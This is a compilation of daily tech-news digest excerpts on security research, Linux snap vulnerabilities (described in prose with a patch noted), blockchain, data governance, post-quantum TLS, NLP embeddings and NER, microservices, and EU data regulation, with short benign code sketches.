Researchers demonstrate a method that safeguards a computer program’s secret information while enabling faster computation. Multiple programs running on the same computer may not be able to directly access each other’s hidden information, but because they share the same memory hardware, their secrets could be stolen by a malicious program through a “memory timing side-channel attack.” This malicious program notices delays when it tries to access a computer’s memory, because the hardware is shared among all programs using the machine. It can then interpret those delays to obtain another program’s secrets, like a password or cryptographic key. One way to prevent these types of attacks is to allow only one program to use the memory controller at a time, but this dramatically slows down computation. Instead, a team of MIT researchers has devised a new approach that allows memory sharing to continue while providing strong security against this type of side-channel attack. Their method is able to speed up programs by 12 percent when compared to state-of-the-art security schemes.


Is API Security the New Cloud Security?

While organizations previously used APIs more sparingly, predominantly for mobile apps or some B2B traffic, “now pretty much everything is powered by an API,” Klimek said. “So of course, all of these new APIs introduce a lot of security risks, and that’s why a lot of CISOs are now paying attention.” Imperva, which Gartner named a “leader” in its web application and API protection (WAAP) Magic Quadrant, lumps API security risks into two categories, according to Klimek. The first one, technical vulnerabilities, includes a bunch of risks that can also exist in standard web applications such as the OWASP Top 10 application security risks and CVE vulnerabilities. The recent Log4j vulnerability falls into this bucket — and demonstrates how far-reaching these types of security flaws can be. Most Imperva customers tackle these API threats first, “because they tend to be some of the most acute and they require just adopting their existing application security strategies,” such as code scanning during the development process and deploying web application firewalls or runtime application self-protection technology, Klimek explained.


Inside the blockchain developers’ mind: Building a free-to-use social DApp

While we still have a pretty good user experience, telling people they have to spend money before they can use an app is a barrier to entry and winds up feeling a whole lot like a fee. I would know; this is exactly what happened on our previous blockchain, Steem. To solve that problem, we added a feature called “delegation” which would allow people with tokens (e.g. developers) to delegate their mana (called Steem Power) to their users. This way, end-users could use Steem-based applications even if they didn’t have any of the native token STEEM. But, that design was very tailored to Steem, which did not have smart contracts and required users to first buy accounts. The biggest problem with delegations is that there was no way to control what a user did with that delegation. Developers want people to be able to use their DApps for free so that they can maximize growth and generate revenue in some other way like a subscription or through in-game item sales. They don’t want people taking their delegation to trade in decentralized finance (DeFi) or using it to play some other developer’s great game like Splinterlands.
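
The delegation problem is easier to see in a toy model. The sketch below is hypothetical accounting, not Steem's actual implementation: once mana is delegated, nothing in the ledger constrains what the recipient spends it on.

    # Toy delegation ledger illustrating the flaw described above: the
    # delegator cannot restrict what delegated mana is used for.
    class Account:
        def __init__(self, mana):
            self.mana = mana
            self.delegated_in = 0

        def delegate(self, other, amount):
            assert amount <= self.mana
            self.mana -= amount
            other.delegated_in += amount

        def spend(self, amount, purpose):
            # 'purpose' is unconstrained: a post, a DeFi trade, anything
            assert amount <= self.mana + self.delegated_in
            used = min(amount, self.delegated_in)
            self.delegated_in -= used
            self.mana -= amount - used
            print(f"spent {amount} mana on {purpose}")

    developer, user = Account(1000), Account(0)
    developer.delegate(user, 50)
    user.spend(50, "defi-trade")   # nothing stops off-app use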


Data governance at the speed of business

Once the data governance organization has been built and its initial policies defined, you can begin to build the muscles that will make data governance a source of nimbleness that will help you anticipate issues, seize opportunities, and pivot quickly as the business environment changes and new sources of data become available. Your data governance capability is responsible for identifying, classifying, and integrating these new and changing data sources, which may come in through milestone events such as mergers or via the deployment of new technologies within your organization. It does so by defining and applying a repeatable set of policies, processes, and supporting tools, the application of which you can think of as a gated process, a sequence of checkpoints new data must pass through to ensure its quality. The first step of the process is to determine what needs to be done to introduce the new data harmoniously. Take, for example, one of our B2B software clients that acquired a complementary company and sought to consolidate the firm’s customer data. 


Irish data watchdog calls for ‘objective metrics’ for big tech regulation

Dixon said that “in some respects at least”, the DPC needs to do better and that it would be beneficial for regulators to have a “shared understanding” of what measures they are tracking. “In the absence of an agreed set of measures to determine achievements or deficiencies, the standing of the GDPR’s enforcement regime in overall terms is at risk of damage,” she said. Dixon said that this was particularly the case “when certain types of allegations” levelled against the Irish DPC “serve only to obscure the true nature and extent of the challenges” presented by the EU regulatory framework – which requires member states to legislate for the enforcement of data protection across the EU. ... That has created a vacuum and “a narrative has emerged in which the number of cases, the quantity and size of the administrative fines levied, are treated as the sole measure of success, informed by the effectiveness of financial penalties” at driving changes in behaviour.


Digital transformation: 3 roadblocks and how to overcome them

Many sectors, such as healthcare and financial services, operate within a complex web of constantly changing regulations that can be difficult to navigate. These regulations, while robust, are critical for sensitive data such as patient information in healthcare, proper execution of protocol in law enforcement, and other essential data that must be managed and used responsibly. How customer and internal data is collected, stored, managed, and used must be prioritized, especially when an enterprise transitions from legacy systems. Establishing a digital system that supports compliance with regulations is a challenge, but once the system is established, every interaction within the organization becomes data that can be monitored if you have the tools to interpret it. Knowing what is going on in every corner of an organization is central to remaining compliant, and setting up intelligent tools that can detect risk across the enterprise will ensure that your organization’s digital transformation is rooted in compliance-first strategies.



Quote for the day:

"Great Groups need to know that the person at the top will fight like a tiger for them. "-- Warren G. Bennis

Daily Tech Digest - February 27, 2022

Oh, Snap! Security Holes Found in Linux Packaging System

The first problem was that the snap daemon snapd didn’t properly validate the snap-confine binary’s location. Because of this, a hostile user could hard-link the binary to another location, which in turn meant a local attacker might be able to execute other arbitrary binaries and escalate privileges. The researchers also discovered that a race condition existed in the snapd snap-confine binary when preparing a private mount namespace for a snap. With this, a local attacker could gain root privileges by bind-mounting their own contents inside the snap’s private mount namespace and making snap-confine execute arbitrary code. There’s no way to exploit this remotely. But if an attacker can log in as an unprivileged user, they could quickly use this vulnerability to gain root privileges. Canonical has released a patch that fixes both security holes. The patch is available in the following supported Ubuntu releases: 21.10, 20.04, and 18.04. A simple system update will fix this nicely.


The DAO is a major concept for 2022 and will disrupt many industries

It is not yet clear where these disruptive technologies will lead us, but we are sure that there will be much value up for grabs. At the convergence of Web3 and NFTs lie many platforms looking to leverage technology and infrastructure to make the NFT ecosystem more decentralized, structured and community-driven. Using both social building and governance, the decentralized autonomous organization disruption is a notch higher. The DAO is one major invention that is challenging current systems of governance. Utilizing NFTs, DAOs are changing our perspective of how organizations and systems should be run, and they lend further credence to the idea that the optimal form of governance need not rely on hierarchical structures. With the principal-agent problem limiting the growth of organizations and preventing agents from feeling like part of a team, you can see why the need for decentralized organizations fostering community-inclusion is paramount. Is there something you would change about your current organization if given the chance? Leadership?


Use the cloud to strengthen your supply chain

What’s interesting about this process is that it does not entail executives in the C-suite pulling all-nighters to come up with these innovative solutions. It’s 100% automated using huge amounts of data and machine learning and embedding these things directly within business processes so the fix happens seconds after the supply chain problem is found. These aspects of intelligent supply chain automation are not new. For years, there has been some deep thinking in terms of how to automate supply chains more effectively. Those of you who specialize in supply chains understand this far too well. How many companies are willing to invest in the innovation—and even the risk—of leveraging these new systems? Most are not, and they are seeing the downsides from the markets tossing them curveballs that they try to deal with using traditional approaches. We’re seeing companies that have been in 10th place in a specific market move to second or third place by differentiating themselves with these intelligent cloud-based systems.


Open Source Code: The Next Major Wave of Cyberattacks

When it comes to testing the resilience of your open source environment with tools, static code analysis is a good first step. Still, organizations must remember that this is only the first layer of testing. Static analysis refers to analyzing the source code before the actual software application or program goes live and addressing any discovered vulnerabilities. However, static analysis cannot detect all malicious threats that could be embedded in open source code. Additional testing in a sandbox environment should be the next step. Stringent code reviews, dynamic code analysis, and unit testing are other methods that can be leveraged. After scanning is complete, organizations must have a clear process to address any discovered vulnerabilities. Developers may be finding themselves against a release deadline, or the software patch may require refactoring the entire program and put a strain on timelines. This process should help developers address tough choices to protect the organization's security by giving clear next steps for addressing vulnerabilities and mitigating issues.


A guide to document embeddings using Distributed Bag-of-Words (DBOW) model

In practice, when it comes to real-world applications of NLP, machines are required to understand the context behind text, which is surely longer than just a single word. For example, say we want to find cricket-related tweets on Twitter. We could start by making a list of all the words that are related to cricket and then try to find tweets that contain any word from the list. This approach can work to an extent, but what if a tweet related to cricket does not contain any word from the list? Take, for example, a tweet that contains the name of an Indian cricketer without mentioning that he is an Indian cricketer. In our daily life we may find many applications and websites, like Facebook, Twitter, and Stack Overflow, which use this approach and fail to obtain the right results for us. To cope with such difficulties, we may use document embeddings, which learn a vector representation of each document rather than of individual words. This can be considered as learning the vector representation at the paragraph level instead of learning word-level representations from the whole corpus.
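
As a concrete sketch, gensim's Doc2Vec trains DBOW embeddings when dm=0. The tiny corpus and hyperparameters below are placeholders.

    # Training DBOW document embeddings with gensim (dm=0 selects the
    # Distributed Bag-of-Words mode); corpus and settings are toy values.
    from gensim.models.doc2vec import Doc2Vec, TaggedDocument

    corpus = [
        "kohli hits a century at eden gardens",
        "new smartphone launched with a bigger battery",
        "spinners dominate on day two of the test match",
    ]
    docs = [TaggedDocument(words=text.split(), tags=[i])
            for i, text in enumerate(corpus)]

    model = Doc2Vec(docs, dm=0, vector_size=50, min_count=1, epochs=100)

    # embed an unseen tweet and find the most similar training document
    vec = model.infer_vector("bowlers on top in the test match".split())
    print(model.dv.most_similar([vec], topn=1))   # expect a cricket doc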


Great Resignation or Great Redirection?

All this Great Resignation talk has many panicking and being reactive. We definitely shouldn’t ignore it, but we should seek to understand what is happening and why. And what the implications are for the future. The truly historical event is the revolution in how people conceive of work and its relationship to other life priorities. Even within that, there are distinctively different categories. We know service workers in leisure and hospitality got hit disproportionately hard by the pandemic. These people unexpectedly found themselves jobless, unsure how they would pay their bills and survive. Being resilient and hard-working, many — like my Uber driver — found gigs doing delivery, rideshare or other jobs giving greater flexibility and autonomy. These jobs also provided better pay than traditional service roles. Now, with their former jobs calling for their return, this group of workers has the ability to choose for themselves what they want. When Covid displaced office workers to their homes, they were bound to realize it was nice to not have that commute or the road warrior travel.


The post-quantum state: a taxonomy of challenges

While all the data seems to suggest that replacing classical cryptography with post-quantum cryptography in the key-exchange phase of TLS handshakes is a straightforward exercise, the problem seems to be much harder for handshake authentication (or for any protocol that aims to provide authentication, such as DNSSEC or IPsec). The majority of TLS handshakes achieve authentication by using digital signatures generated via advertised public keys in public certificates (what is called “certificate-based” authentication). Most of the post-quantum signature algorithms currently being considered for standardization in the NIST post-quantum process have signatures or public keys that are much larger than their classical counterparts; a Dilithium2 signature, for instance, is roughly 2.4 KB and its public key 1.3 KB, compared with 64-byte signatures and 32-byte public keys for Ed25519. Their operations’ computation time is, in the majority of cases, also much higher. It is unclear how this will affect TLS handshake latency and round-trip times, though we now have better insight into which sizes can be used. We still need to know how much slowdown will be acceptable for early adoption.


An overview of the blockchain development lifecycle

Databases developed with blockchain technologies are notoriously difficult to hack or manipulate, making them a perfect space for storing sensitive data. Blockchain software development requires an understanding of how blockchain technology works. To learn blockchain development, developers must be familiar with interdisciplinary concepts, for example, with cryptography and with popular blockchain programming languages like Solidity. A considerable amount of blockchain development focuses on information architecture, that is, how the database is actually to be structured and how the data is to be distributed and accessed with different levels of permissions. ... Determine if the blockchain will include specific permissions for targeted user groups or if it will comprise a permissionless network. Afterward, determine whether the application will require the use of a private or public blockchain network architecture. Also consider the hybrid consortium, or public permissioned blockchain architecture. With a public permissioned blockchain, a participant can only add information with the permission of other registered participants.


How TypeScript Won Over Developers and JavaScript Frameworks

Microsoft’s emphasis on community also extends to developer tooling; another reason the Angular team cited for their decision to adopt the language. Microsoft’s own VS Code naturally has great support for TypeScript, but the TypeScript Language Server provides a common set of editor operations — like statement completions, signature help, code formatting, and outlining. This simplifies the job for vendors of alternative IDEs, such as JetBrains with WebStorm. Ekaterina Prigara, WebStorm project manager at JetBrains, told the New Stack that “this integration works side-by-side with our own support of TypeScript – some of the features of the language support are powered by the server, whilst others, e.g. most of the refactorings and the auto import mechanism, by the IDE’s own support.” The details of the integration are quite complex. Continued Prigara, “Completion suggestions from the server are shown but they could, in some cases, be enhanced with the IDE’s suggestions. It’s the same with the error detection and quick fixes. Formatting is done by the IDE. Inferred types shown on hover, if I’m not mistaken, come from the server. ...”


Developing and Testing Services Among a Sea of Microservices

The first option is to take all of the services that make up the entire application and put them on your laptop. This may work for a smaller application, but if your application is large or has many services, it breaks down quickly. Imagine having to install, update, and manage 500, 1,000, or 5,000 services in your development environment on your laptop. When a change is made to one of those services, how do you get it updated? ... The second option solves some of these issues. Imagine having the ability to click a button and deploy a private version of the application in a cloud-based sandbox accessible only to you. This sandbox is designed to look exactly like your production environment. Ideally, it even uses the same Terraform configurations to create the infrastructure and connect everything, but with smaller and fewer cloud instances, so it costs less to run. Then, you can link the service running on your laptop to this developer-specific cloud setup and make it look like it’s running in a production environment.
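
One simple way to do that linking, sketched below with hypothetical service names and URLs, is to have the service resolve each downstream dependency from its environment, so the same code points at the sandbox locally and at the real deployments in production.

import os

# Hypothetical downstream services; in the sandbox workflow described above,
# these variables would point at your personal cloud environment, while in
# production they point at the real deployments.
DEFAULTS = {
    "ORDERS_URL":    "http://orders.internal:8080",
    "INVENTORY_URL": "http://inventory.internal:8080",
}

def service_url(name: str) -> str:
    """Resolve a dependency's base URL from the environment, falling back to
    the in-cluster default."""
    return os.environ.get(name, DEFAULTS[name])

# e.g. before starting the local service:
#   export ORDERS_URL=https://orders.sandbox-jane.example.dev
print(service_url("ORDERS_URL"))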



Quote for the day:

"Courage is leaning into the doubts and fears to do what you know is right even when it doesn't feel natural or safe." -- Lee Ellis

Daily Tech Digest - February 26, 2022

How To Study and Learn Complex Software Engineering Concepts

Chunking is a powerful technique for learning new concepts by breaking big, complex subjects down into smaller, manageable units that represent the core concepts you need to master. Let’s say you would like to start your Data Science journey. Grab a book or find a comprehensive online curriculum on the subject and begin by scanning the table of contents and skim-reading the chapters, browsing the headers, sub-headers, and illustrations. This lets you get a feel for the material you are about to explore, make mental observations about how it is organized, and start appreciating what the big picture looks like, so you can fill in the details later. After this first stage, you need to start learning the ins and outs of the individual chunks. It is not as intimidating as you originally thought, because you have already formed an idea of what you will be studying. So, continuing our previous example, you can go through the book chapters in depth, then supplement your knowledge by looking at Wikipedia, watching video tutorials, finding online resources, and taking extensive notes along the way.


RISC-V AI Chips Will Be Everywhere

The adoption of RISC-V, a free and open-source computer instruction set architecture first introduced in 2010, is taking off like a rocket. And much of the fuel for this rocket is coming from demand for AI and machine learning. According to the research firm Semico, the number of chips that include at least some RISC-V technology will grow 73.6 percent per year to 2027, when there will be some 25 billion AI chips produced, accounting for US $291 billion in revenue. The increase from what was still an upstart idea just a few years ago to today is impressive, but for AI it also represents something of a sea change, says Dave Ditzel, whose company Esperanto Technologies has created the first high-performance RISC-V AI processor intended to compete against powerful GPUs in AI-recommendation systems. According to Ditzel, during the early mania for machine learning and AI, people assumed general-purpose computer architectures—x86 and Arm—would never keep up with GPUs and more purpose-built accelerator architectures.


Sustainable architectures in a world of Agile, DevOps, and cloud

Driving architectural decisions is an essential activity in Continuous Architecture, and architectural decisions are the practitioner’s primary unit of work. Almost every architectural decision involves tradeoffs. For example, a decision made to optimize the implementation of a quality attribute requirement such as performance may negatively impact the implementation of other quality attributes, such as usability or maintainability. An architectural decision made to accelerate the delivery of a software system may increase technical debt, which needs to be “repaid” at some point in the future and may impact the sustainability of the system. Finally, all architectural decisions affect the cost of the system, and compromises may need to be made to meet the budget allocated to that system. All tradeoffs are reflected in the executable code base. Because of constraints beyond the team’s control, the tradeoffs made are often the least unfavorable options rather than the optimal ones, and decisions often need to be adjusted based on feedback from the system’s stakeholders.


6 Cyber-Defense Steps to Take Now to Protect Your Company

Modern device management is an essential part of increasing security in remote and hybrid work environments. A unified endpoint management (UEM) approach fully supports bring-your-own-device (BYOD) initiatives while maximizing user privacy and securing corporate data at the same time. UEM architectures usually include the ability to easily onboard and configure device and application settings at scale, establish device hygiene with risk-based patch management and mobile threat protection, monitor device posture and ensure compliance, identify and remediate issues quickly and remotely, automate software updates and OS deployments, and more. Choose a UEM solution with management capabilities for a wide range of operating systems, and one that is available both on-premises and via software-as-a-service (SaaS). ... Companies should look to combat device vulnerabilities (jailbroken devices, vulnerable OS versions, etc.), network vulnerabilities, and application vulnerabilities (high security risk assessments, high privacy risk assessments, suspicious app behavior, etc.).


Europe proposes rules for fair access to connected device data

The Data Act looks to be a key component of the EU’s response to that threat. ... Secondly, the Commission is concerned about abusive contractual terms being imposed on smaller companies by more powerful platforms and market players to, essentially, extract the less powerful company’s most valuable data — so the Data Act will bring in a “fairness test” with the goal of protecting SMEs against unfair contractual terms. The legislation will stipulate a list of unilaterally imposed contractual clauses that are deemed or presumed to be unfair — such as a clause stating that a company can unilaterally interpret the terms of the contract — and those that do not pass the test will not be binding on SMEs. The Commission says it will also develop and recommend non-binding model contractual terms, saying these standard clauses will help SMEs negotiate “fairer and balanced data sharing contracts with companies enjoying a significantly stronger bargaining position.” Some major competition complaints lodged against tech giants in the EU have concerned their access to third-party data, such as the investigation into Amazon’s use of merchants’ data.


Mind of its own: Will “general AI” be like an alien invasion?

Yes, we will have created a rival, and yet we may not recognize the dangers right away. In fact, we humans will most likely look upon our super-intelligent creation with overwhelming pride — one of the greatest milestones in recorded history. Some will compare it to attaining the godlike power of creating thinking, feeling creatures from scratch. But soon it will dawn on us that these new arrivals have minds of their own. They will surely use their superior intelligence to pursue their own goals and aspirations, driven by their own needs and wants. It is unlikely they will be evil or sadistic, but their actions will certainly be guided by their own values, morals, and sensibilities, which will be nothing like ours. Many people falsely assume we will solve this problem by building AI systems in our own image, designing technologies that think, feel, and behave just like we do. This is unlikely to be the case. Artificial minds will not be created by writing software with carefully crafted rules that make them behave like us.


5 ITSM hurdles and how to overcome them

Unclear communication makes it far more difficult to explain the value of ITSM to the business, to properly organize ITSM efforts, to set expectations for its deployment, and to secure proper funding for it. HjortkjĂŠr suggests using the CMDB to map IT components to business applications, assigning ownership of those applications to both IT and business sponsors, and asking those sponsors to explain each application’s role in the business, how best to use it, and eventually when to replace it. Thomas Smith, director of telecommunications and IT support at funeral goods and services provider Service Corp. International, recommends being candid about schedules. “One of the biggest mistakes we made in the past, and still make, is to say ‘We’re going to get it done in three months.’ Four months later, everyone is still hoping for three months,” he says. Understand any deficiencies in your ITSM tool or services, he recommends, “and tell the business process owners ‘We have a plan to address it.’” Calvo says the terms of SLAs, such as those it created using BMC’s Helix ITSM platform, can help set expectations and reduce frustration from users who “think everything should be solved ASAP.”
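
HjortkjĂŠr’s CMDB suggestion reduces to a simple relationship model. A minimal sketch, with invented component, application, and owner names, might look like this:

# Toy CMDB fragment: map IT components to the business applications they
# support, and give each application both an IT and a business owner.
# All names are hypothetical.
cmdb = {
    "payroll-app": {
        "components": ["db-server-07", "vm-cluster-2", "sso-gateway"],
        "it_owner": "infrastructure-team",
        "business_owner": "head-of-hr",
        "business_role": "runs monthly payroll for all staff",
    },
}

def impacted_applications(component: str) -> list[str]:
    """Which business applications does this component support?"""
    return [app for app, rec in cmdb.items() if component in rec["components"]]

print(impacted_applications("db-server-07"))  # -> ['payroll-app']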


Data Mapping Best Practices

Many applications share the same pattern of naming common fields on the frontend, but under the hood these same fields can have quite different labels. Consider the field “Customers”: in the source code of your company’s CRM it might still be labeled “customers”, but your ERP system calls it “clients”, your finance tool calls it “customer”, and the tool your organization uses for customer messaging labels it “users” altogether. This label conundrum is probably one of the most common data mapping examples. To add to the complexity, what if a two-field output from one system is expected as a one-field input in another, or vice versa? This commonly happens with First Name / Last Name: a customer “Allan” “McGregor” from your eCommerce system will need to become “Allan McGregor” in your ERP. Or my favorite example: the potential customer email address submitted through your company’s website will need to become “first-name: Steven”, “last-name: Davis”, and “company: Rangers” in your customer relationship management tool.
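
A minimal sketch of both transformations, the cross-system field renaming and the name split/join, using hypothetical system labels and the examples above:

# How each system labels the same logical "customer" field.
FIELD_MAP = {
    "crm":       {"customer": "customers"},
    "erp":       {"customer": "clients"},
    "finance":   {"customer": "customer"},
    "messaging": {"customer": "users"},
}

def rename(record: dict, source: str, target: str) -> dict:
    """Translate a record's keys from one system's labels to another's."""
    to_logical = {v: k for k, v in FIELD_MAP[source].items()}
    return {FIELD_MAP[target][to_logical[k]]: v for k, v in record.items()}

def join_name(first: str, last: str) -> str:
    """Two fields in, one field out: eCommerce -> ERP."""
    return f"{first} {last}"

def split_email(email: str) -> dict:
    """One field in, three fields out, via a naive first.last@company heuristic."""
    local, domain = email.split("@")
    first, _, last = local.partition(".")
    return {
        "first-name": first.capitalize(),
        "last-name": last.capitalize(),
        "company": domain.split(".")[0].capitalize(),
    }

print(rename({"customers": 42}, "crm", "erp"))     # {'clients': 42}
print(join_name("Allan", "McGregor"))              # 'Allan McGregor'
print(split_email("steven.davis@rangers.co.uk"))   # Steven / Davis / Rangers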
 

How to perform Named Entity Recognition (NER) using a transformer?

Named entities can belong to different classes: Virat Kohli is the name of a person, while Lenovo is the name of a company. The process of recognizing such entities along with their class can be considered Named Entity Recognition. Traditional approaches to NER mostly rely on spaCy and NLTK. NER has a variety of applications in natural language processing, for example summarizing information from documents, search engine optimization, content recommendation, and identifying entities in biomedical processes. In this article, we aim to make the implementation of NER easy by using transformers like BERT. Since the implementation will be performed using BERT, we first need to know what BERT is. In one of the previous articles, we had a detailed introduction to BERT. BERT stands for Bidirectional Encoder Representations from Transformers. It is a well-known pre-trained transformer model in the field of NLP.
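
A minimal sketch of transformer-based NER using the Hugging Face transformers library; the checkpoint named below, dslim/bert-base-NER, is one publicly available BERT model fine-tuned for NER and is chosen purely for illustration.

# pip install transformers torch
from transformers import pipeline

# Load a BERT checkpoint fine-tuned for NER; aggregation_strategy="simple"
# merges word-piece tokens back into whole entity spans.
ner = pipeline("ner", model="dslim/bert-base-NER", aggregation_strategy="simple")

for entity in ner("Virat Kohli signed a sponsorship deal with Lenovo in Bengaluru."):
    print(f'{entity["word"]:>12}  {entity["entity_group"]:<4}  score={entity["score"]:.2f}')
# Expected entity groups: PER (Virat Kohli), ORG (Lenovo), LOC (Bengaluru)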


Using artificial intelligence to find anomalies hiding in massive datasets

To learn the complex conditional probability distribution of the data, the researchers used a special type of deep-learning model called a normalizing flow, which is particularly effective at estimating the probability density of a sample. They augmented that normalizing flow model with a type of graph known as a Bayesian network, which can learn the complex, causal relationship structure between different sensors. This graph structure enables the researchers to see patterns in the data and estimate anomalies more accurately, Chen explains. “The sensors are interacting with each other, and they have causal relationships and depend on each other. So, we have to be able to inject this dependency information into the way that we compute the probabilities,” he says. This Bayesian network factorizes, or breaks down, the joint probability of the multiple time series data into less complex, conditional probabilities that are much easier to parameterize, learn, and evaluate.
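
The factorization idea is easy to state in code. In the sketch below, a made-up three-sensor graph and simple Gaussian conditionals stand in for the learned normalizing flows; a sample is scored by summing conditional log-densities along the network structure, so samples that violate the learned dependencies get much lower scores.

import math

# Hypothetical Bayesian network over three sensors: s1 -> s2 -> s3.
PARENTS = {"s1": [], "s2": ["s1"], "s3": ["s2"]}

def gaussian_logpdf(x, mean, std):
    return -0.5 * math.log(2 * math.pi * std**2) - (x - mean) ** 2 / (2 * std**2)

def conditional_logp(sensor, value, sample):
    """Stand-in for a learned conditional density p(sensor | parents).
    Here: each sensor tracks the mean of its parents, with unit noise."""
    mean = sum(sample[p] for p in PARENTS[sensor]) / max(len(PARENTS[sensor]), 1)
    return gaussian_logpdf(value, mean, 1.0)

def joint_logp(sample):
    # Chain-rule factorization: log p(x) = sum_i log p(x_i | parents(x_i)).
    return sum(conditional_logp(s, v, sample) for s, v in sample.items())

normal  = {"s1": 0.1, "s2": 0.2, "s3": 0.1}
anomaly = {"s1": 0.1, "s2": 5.0, "s3": 0.0}
print(joint_logp(normal), joint_logp(anomaly))  # the anomaly scores far lower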



Quote for the day:

"It's not about how smart you are--it's about capturing minds." -- Richie Norton